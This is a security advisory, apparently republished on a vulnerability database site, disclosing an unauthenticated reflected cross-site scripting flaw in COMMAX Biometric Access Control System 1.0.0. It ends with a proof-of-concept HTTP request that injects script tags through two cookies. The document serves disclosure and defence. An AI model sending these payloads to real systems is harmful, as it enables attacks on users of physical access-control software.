Tuesday, August 17, 2021

COMMAX Biometric Access Control System 1.0.0 Cross Site Scripting


COMMAX Biometric Access Control System 1.0.0 Cookie Reflected XSS


Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: 1.0.0

Summary: Biometric access control system.

Desc: The application is vulnerable to an unauthenticated reflected
cross-site scripting (XSS) vulnerability. Input passed to the Cookies
'CMX_ADMIN_NM' and 'CMX_COMPLEX_NM' is not properly sanitised before
being returned to the user. This can be exploited to execute arbitrary
HTML and JS code in a user's browser session in context of an affected
site.

Tested on: nginx/1.14.0 (Ubuntu)
MariaDB/10.3.15


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2021-5660
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5660.php


02.08.2021

--


GET /db_dump.php HTTP/1.1
Host: 192.168.1.1
Upgrade-Insecure-Requests: 1
User-Agent: UA/1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=lab"><script>confirm(document.domain)</script>; CMX_ADMIN_LV=8; CMX_COMPLEX_NM=ZSL"><script>confirm(window.origin)</script>; CMX_COMPLEX_IP=2.5.1.0
Connection: close
 

Copyright © 2020 Cyber Details - Vulnerability Database™

Thanks for everything Templateism - You should have written the code a little more complicated